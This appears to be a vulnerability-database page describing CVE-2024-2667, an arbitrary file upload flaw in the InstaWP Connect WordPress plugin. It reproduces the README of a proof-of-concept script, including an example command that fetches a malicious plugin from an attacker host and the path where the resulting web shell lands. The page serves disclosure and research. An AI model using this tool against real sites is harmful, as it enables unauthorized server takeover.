关联漏洞
标题:
WordPress plugin InstaWP Connect 安全漏洞
(CVE-2024-2667)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin InstaWP Connect 0.1.0.22 版本及之前版本存在安全漏洞,该漏洞源于 /wp-json/instawp-connect/v1/config REST API 端点中的文件验证不足,导致任意文件上传。
介绍
# CVE-2024-2667-Poc 🚀
## Description
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
# Script Usage Guide ⚙️
### Install Requirements
| Description | Details | Icon |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Install Required Libraries | Use `pip` to install the necessary Python libraries: `requests` and `beautifulsoup4`. | 🛠️ |
| Command to Install | Run: `pip install requests beautifulsoup4`. | 📥 |
### Run the Script
| Description | Details | Icon |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Execute the Script | Run the script using the command line with required arguments. | 🚀 |
| Required Arguments | - `-up`: Plugin URL (e.g., `http://attacker-domain/malicious-plugin.zip`). |
| | - `-u`: Target WordPress URL (e.g., `http://victim-domain/`). | 🔧 |
| Example Command | `python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/` | 📜 |
### Check Vulnerability
| Description | Details | Icon |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Version Check | The script examines the `readme.txt` file for the version of the target plugin. | 🔍 |
| Vulnerable Version | If the version is `<= 0.1.0.22`, the script prints: `The site is vulnerable.` | ⚠️ |
| Safe Version | If the version is `> 0.1.0.22`, the script prints: `The site is not vulnerable.` | ✅ |
### Shell Location
| Description | Details | Icon |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Shell Path | If the upload is successful, the shell will be accessible at: | 🐚 |
| | `wp-content/plugins/instawp-connect/shell.php`. |
### usage -help
```
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
options:
-h, --help show this help message and exit
-up URL_PLUGIN, --url_plugin URL_PLUGIN
URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
-u URL_TARGET, --url_target URL_TARGET
URL of the target WordPress site (e.g., http://victim-domain/).
```
文件快照
[4.0K] /data/pocs/1c0bda3e837011da963e42896142f7aff1a8461f
├── [3.1K] CVE-2024-2667.py
└── [4.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。